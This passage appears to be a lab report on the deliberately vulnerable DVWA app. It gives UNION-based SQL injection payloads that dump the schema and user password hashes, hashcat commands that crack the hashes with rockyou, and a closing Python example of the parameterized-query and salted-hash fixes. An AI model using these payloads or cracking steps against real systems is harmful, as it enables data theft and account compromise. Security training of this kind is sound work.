When we change the ID parameter in the URL, the result is the same as when we use the input field: the form is submitted and we get the result.
When we put the following command in the field:
```sql
%' or 0=0 union select null, version() #
```
The query is executed and the following result is obtained:
We conclude that the database is MariaDB version 10.1.26.
To select the important user information, we followed these steps:
- Look at the names of the tables to identify the users
To see the tables, we used the following command:
```sql
%' or 0=0 union select table_name, null from information_schema.tables #
```
The following result is obtained:
So the users table is named users. There are other tables of course, but we stopped the capture at this level for readability reasons.
- Identify important columns
We used the following command to find the columns of the users table:
```sql
%' or 0=0 union select column_name, null from information_schema.columns where table_name = 'users' #
```
Here is the result:
This picture shows all the columns of the table (highlighted in yellow).
- Select user data on the fields we are interested in
We have chosen to retrieve the following fields: user_id, user, first_name, last_name, last_login, password.
Here is the query used:
```sql
%' or 0=0 union select 'user_id|user|first_name|last_name|last_login|password', concat(user_id,'|',user, '|', first_name, '|', last_name, '|', last_login, '|', password) from users #
```
And here is the result:
The value of the First Name field is displayed only to help us find the value of the Surname field.
To find the name of the database, we used this query:
```sql
%' or 0=0 union select null, database() #
```
This gives as an answer:
The query to do this is as follows:
```sql
%' or 0=0 union select table_name, null from information_schema.tables #
```
We also used it in answer 1.
Below is the result:
We have already done so in answer 2.2.2; here is the query we used:
```sql
%' or 0=0 union select column_name, null from information_schema.columns where table_name = 'users' #
```
2.2.5. Now that we have the column names, print out the usernames and hashed passwords for each user!
We used this query to get the usernames and passwords of the users:
```sql
%' or 0=0 union select 'user|password', concat(user, '|', password) from users #
```
Result:
The logic of the output is the same as in answer 2.2.2.
To crack the passwords, we followed these steps.
We used the following echo command to create the file:
```bash
echo -e "5f4dcc3b5aa765d61d8327deb882cf99\ne99a18c428cb38d5f260853678922e03\n8d3533d75ae2c3966d7e0d4fcc69216b\n0d107d09f5bbe40cade3de5c71e9e9b7\n5f4dcc3b5aa765d61d8327deb882cf99" >> target_hashes.txt
```
Here is what it looks like when displayed:
The decompression was performed with the following command:
```bash
gunzip /usr/share/wordlists/rockyou.txt.gz
```
The result:
Here is the command used:
```bash
hashcat -m 0 -a 0 -o cracked.txt target_hashes.txt /usr/share/wordlists/rockyou.txt
```
Here is what you get after cracking:
We had 5 hashes but only 4 results; this is because two of the hashes are identical, so they correspond to the same password.
Here is the final result with the users and their passwords in clear:
| Id | Username | First Name | Last Name | Real Password | Hashed password |
|---|---|---|---|---|---|
| 1 | admin | admin | admin | password | 5f4dcc3b5aa765d61d8327deb882cf99 |
| 2 | gordonb | Gordon | Brown | abc123 | e99a18c428cb38d5f260853678922e03 |
| 3 | 1337 | Hack | Me | charley | 8d3533d75ae2c3966d7e0d4fcc69216b |
| 4 | pablo | Pablo | Picasso | letmein | 0d107d09f5bbe40cade3de5c71e9e9b7 |
| 5 | smithy | Bob | Smith | password | 5f4dcc3b5aa765d61d8327deb882cf99 |
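As an added example (not part of the original report or of DVWA), the two weaknesses exploited above side by side with their fixes: the string-built lookup that accepts the UNION payload beside a parameterized one, and unsalted MD5 beside a salted slow hash, which is why the two users with the password "password" shared one hash. SQLite stands in for MariaDB (so the payload uses `--` and `sqlite_version()` instead of `#` and `version()`), the users rows are constructed from the table above, and the PBKDF2 parameters are assumed.

```python
import hashlib
import os
import sqlite3

# Constructed stand-in for the DVWA users table (values from the table above).
ROWS = [
    (1, "admin", "5f4dcc3b5aa765d61d8327deb882cf99"),
    (2, "gordonb", "e99a18c428cb38d5f260853678922e03"),
    (5, "smithy", "5f4dcc3b5aa765d61d8327deb882cf99"),
]

# SQLite dialect of the write-up's payload (assumed adaptation).
PAYLOAD = "%' OR 0=0 UNION SELECT null, sqlite_version() -- "


def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (user_id INTEGER, user TEXT, password TEXT)")
    db.executemany("INSERT INTO users VALUES (?, ?, ?)", ROWS)
    return db


def lookup_vulnerable(db, user_id):
    # The quote in the payload closes the literal; the rest is parsed as SQL,
    # so every row plus the version string comes back.
    sql = f"SELECT user, password FROM users WHERE user_id = '{user_id}'"
    return db.execute(sql).fetchall()


def lookup_safe(db, user_id):
    # Bound parameter: the payload is compared as an opaque value, no rows match.
    return db.execute("SELECT user, password FROM users WHERE user_id = ?",
                      (user_id,)).fetchall()


def md5_hex(pw):
    # What DVWA stores: unsalted MD5, identical for identical passwords.
    return hashlib.md5(pw.encode()).hexdigest()


def salted_hash(pw, salt=None):
    # Per-user random salt + PBKDF2-HMAC-SHA256 (assumed parameters): equal
    # passwords give different hashes and each guess costs 600k iterations.
    if salt is None:
        salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", pw.encode(), salt, 600_000)
    return salt.hex() + "$" + digest.hex()


def verify_salted(pw, stored):
    salt_hex = stored.split("$")[0]
    return salted_hash(pw, bytes.fromhex(salt_hex)) == stored
```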